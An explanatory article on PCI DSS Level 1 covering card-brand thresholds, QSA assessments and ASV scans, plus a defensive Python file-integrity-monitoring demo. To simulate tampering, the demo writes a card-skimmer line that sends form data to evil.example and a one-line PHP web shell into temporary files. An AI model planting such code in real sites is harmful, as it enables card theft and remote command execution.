PCI DSS (Payment Card Industry Data Security Standard) is the set of security requirements for protecting card and cardholder data maintained by the PCI Security Standards Council (PCI SSC), a body founded by the global card brands American Express, Discover, JCB, Mastercard and Visa.
The card brands enforce the standard through the acquiring banks: every bank that lets merchants accept Visa, Mastercard, American Express, Discover or JCB cards requires those merchants to validate compliance at the level that applies to them and is responsible for overseeing that validation.
PCI DSS Level 1 is the highest validation level. It applies to merchants whose annual transaction volume exceeds the card brands' thresholds (given below) and to service providers that store, process or transmit more than 300,000 card transactions a year, which in practice covers most providers that store card data on behalf of other companies.
In other words, a company that wants to store card data securely must either validate its own PCI DSS compliance or keep card data out of its own systems and rely on a Level 1 validated infrastructure provider.
To validate at Level 1, a company must pass an annual on-site assessment by a Qualified Security Assessor (QSA), quarterly external vulnerability scans by an Approved Scanning Vendor (ASV), and regular internal scans and penetration tests, and it must run its systems and operations according to the standard's twelve requirements and their detailed sub-requirements, all of which are re-examined every year.
For a company whose core business is not payments, this means a significant and recurring operational and technical investment: scoping, remediation, assessment and re-validation every year, with staff and budget tied up in work that does not contribute directly to the product.
That is why many companies worldwide choose to partner with specialist payment providers that operate PCI DSS Level 1 validated infrastructure, so that card data is handled on systems that meet the standard rather than on their own.
What is PCI Compliance?
PCI compliance means meeting the Payment Card Industry Data Security Standard (PCI DSS), the set of security requirements the PCI SSC maintains so that every company that processes, stores or transmits cardholder data keeps that data in a secure environment. The PCI SSC was created by the major card brands (Visa, Mastercard, American Express, Discover and JCB); the brands themselves define the compliance levels, four for merchants and two for service providers, that determine how compliance is validated.
PCI DSS, whose first version was released in 2004, asks different validation actions of different organizations based on the number and type of card transactions they handle each year. The twelve requirements themselves apply to everyone in scope; the level determines how compliance must be proven.
The levels recognize that the risk to cardholder data grows with the number of payment card transactions processed. Therefore, the fewer the transactions, the lower the level and the lighter the validation burden (a self-assessment questionnaire rather than an on-site assessment by a QSA).
What is PCI DSS Level 1?
Simply stated, PCI DSS Level 1 is the most stringent validation tier for businesses that store, transmit or process card data.
For Visa, Level 1 covers any merchant that processes more than 6 million Visa transactions per year, across all channels. Visa also reserves the right to designate any merchant as Level 1 at its discretion, regardless of volume, in order to minimize risk to the payment system.
Level 1 is the highest of the four merchant compliance levels; two further levels exist for service providers. All of them exist to protect card and cardholder data in e-commerce and in-store transactions.
A "Level 1" merchant is defined by the card brands as one that processes at least 1 million, 2.5 million or 6 million transactions per year, depending on which brand's cards the merchant accepts, and it is the highest and most stringent PCI DSS level.
In addition, a merchant or service provider that suffers a breach or cyberattack resulting in the compromise of card or cardholder data can be moved to Level 1 by the card brands, regardless of its size or transaction volume.
The Level 1 merchant thresholds depend on which payment card brands the merchant accepts:
- Visa, Mastercard and Discover classify as Level 1 any merchant that processes more than 6 million transactions of their brand per year.
- American Express sets the Level 1 threshold at 2.5 million transactions per year.
- JCB sets it at 1 million transactions per year.
Merchants are not the only entities that need to be PCI compliant. Service providers, such as payment processors, gateways and hosting providers, that store, process or transmit cardholder data on a merchant's behalf, or that can affect the security of that data, must also demonstrate ongoing compliance and the continuing security of their cardholder data environments.
What Does PCI DSS Level 1 Mean for Your Business?
PCI DSS Level 1 validation makes you more trustworthy in the eyes of consumers and spares you costly non-compliance penalties. It also strengthens your position when negotiating with acquiring banks, because they can see that you take the security of personal and card data seriously.
Validating at Level 1 yourself, or working with a PCI DSS Level 1 validated hosting or payment provider, brings several benefits for your business and website, including:
- It helps avoid the fines, which can be substantial, that follow a compromise.
- Quarterly external vulnerability scans by an Approved Scanning Vendor (ASV), as PCI DSS mandates, are part of the service.
- Vulnerabilities flagged by the ASV scan, whether in code or in configuration, must be remediated and rescanned until a passing scan is achieved.
- Annual penetration testing by an external party tests the security of the infrastructure.
- File Integrity Monitoring (FIM) detects unauthorized changes to critical system files, configuration files and content files, including application source.
- The hosting platform itself is built to meet all twelve PCI DSS requirements.
- PCI compliance reduces the risk of fraud and the likelihood of a compromise.
- Banks may offer you better rates as a merchant because you are PCI compliant.
- Being able to state on your website that you are PCI DSS compliant reassures online shoppers.
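The FIM item in the list above is the one benefit that maps directly to a control you can build: PCI DSS requires a change-detection mechanism on critical system, configuration and content files, with comparisons at least weekly (Requirement 11.5 in v3.2.1, 11.5.2 in v4.0). The Python script below is an added example written for this page, not code from the original article or from any hosting product it describes. It hashes a small file tree, stores the baseline, simulates the kind of tampering a skimmer or web-shell drop would cause, and reports which files were modified, added or deleted. The file names, contents and the tampering scenario are all constructed for the demonstration.

```python
"""Minimal file-integrity check in the spirit of PCI DSS change detection.

Added illustration, not code from the page or any product it mentions.
The file tree, its contents and the simulated tampering are constructed
inline so the script runs offline with only the standard library.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def file_digest(path: Path) -> str:
    """SHA-256 of a file's contents, streamed so large files are not read into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict[str, str]:
    """Map every regular file under root (as a relative path) to its digest."""
    return {
        str(p.relative_to(root)): file_digest(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Classify differences between two snapshots: changed, new and missing files."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(set(current) - set(baseline)),
        "deleted": sorted(set(baseline) - set(current)),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: snapshot a tiny 'web root', tamper with it, re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "checkout").mkdir()
        (root / "checkout" / "payment.js").write_text("submitCard(form);\n")
        (root / "config.ini").write_text("tls_min_version = 1.2\n")
        (root / "README").write_text("static site\n")

        baseline = build_baseline(root)
        # A baseline is only trustworthy if kept off the monitored host (or signed);
        # serializing it here just shows the shape a stored baseline would have.
        stored = json.dumps(baseline, indent=1)

        # Simulated unauthorized changes: a skimmer appended to the checkout
        # script, a weakened TLS setting, a dropped web shell, a removed file.
        (root / "checkout" / "payment.js").write_text(
            "submitCard(form);\nfetch('//evil.example/c', {method: 'POST', body: form});\n"
        )
        (root / "config.ini").write_text("tls_min_version = 1.0\n")
        (root / "shell.php").write_text("<?php system($_GET['c']); ?>\n")
        (root / "README").unlink()

        return compare(json.loads(stored), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

In a real deployment the baseline is refreshed only through the change-control process, the comparison runs on a schedule (daily is common; weekly is the PCI DSS minimum) and every non-empty report is routed to whoever handles security alerts, since an unexplained change to a checkout script or a TLS setting is exactly the signal the control exists to catch.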
How Do Level 1 Merchants Comply with PCI DSS?
Level 1 merchants and service providers must undergo an annual on-site assessment and obtain a Report on Compliance (ROC). For merchants the assessor may be a Qualified Security Assessor (QSA) or a qualified Internal Security Assessor (ISA); Level 1 service providers need a QSA.
Those at PCI Levels 2, 3, and 4 can self-assess by completing the PCI DSS Self-Assessment Questionnaire (SAQ) provided by the security standards council.
The PCI Level 1 criteria for merchants are:
- Processes more than 6 million Mastercard, Visa or Discover transactions per year OR
- Processes more than 2.5 million American Express transactions per year OR
- Processes more than 1 million JCB transactions per year OR
- A data breach or cyberattack resulting in the capture of cardholder data OR
- Designated as Level 1 by a card brand
The PCI Level 1 validation requirements for merchants are:
- Annual Report on Compliance (ROC) and Attestation of Compliance (AOC) by a Qualified Security Assessor (QSA) or Internal Security Assessor (ISA)
- Quarterly network scan by Approved Scanning Vendor (ASV)
In addition, merchants must submit the results of their assessment (the AOC) to their acquiring bank. Acquirers, in turn, are bound by the card brands' rules and procedures regarding their merchants' PCI compliance.
The validation requirements are stricter at Level 1 because of the higher processing volume. Where Levels 2, 3 and 4 may generally self-assess with an SAQ, a Level 1 merchant must pass an annual on-site assessment by a QSA (or ISA) in addition to the quarterly ASV scans that apply at every level.
The annual assessment consists of a series of steps taken by the QSA, including a review of the cardholder data environment and any point-of-sale (POS) systems, a detailed review of areas of vulnerability, and a prioritized list of improvements to prevent attacks. After the assessment, your job is to maintain the controls and monitoring needed to stay compliant continuously until the next assessment, not just at audit time.
While the PCI assessment may seem a long and arduous process, the cost of remaining non-compliant is far higher. A breach of customer card data not only damages the reputation of your business; you can also expect fines from the card brands, passed on through your acquirer, and potentially lawsuits from banks and affected customers.
What is a PCI Level 1 Service Provider?
Service providers process payments on behalf of merchants or provide services, such as hosting, that can affect the security of cardholder data for merchants and acquiring banks. The criteria and validation requirements for Level 1 service providers therefore differ slightly from those for Level 1 merchants:
PCI Level 1 criteria for Service Providers are:
- Applies to service providers that store, process or transmit more than 300,000 card transactions per year.
PCI Level 1 requirements for Service Providers are:
- Annual Report on Compliance (ROC) and Attestation of Compliance (AOC) prepared by a Qualified Security Assessor (QSA)
- Quarterly network scan by Approved Scanning Vendor (ASV)
- Penetration Test
- Internal Scan
If you are new to PCI compliance, the PCI Security Standards Council website is the best place to start. It publishes the standard, the self-assessment questionnaires and the lists of approved assessors (QSAs) and scanning vendors (ASVs). Many PCI-compliant vendors on the market will also handle much of the process with minimal involvement on your part.
PCI compliance is undoubtedly a complex process, but there is good reason for the difficulty. Customer payment data is a high-value target, and any business that handles it should do its best to protect it.
If the process is too much to handle on your own, find a PCI-compliant vendor to guide you. First, however, make sure you understand the PCI DSS requirements yourself, because your business remains ultimately responsible for the card data it accepts.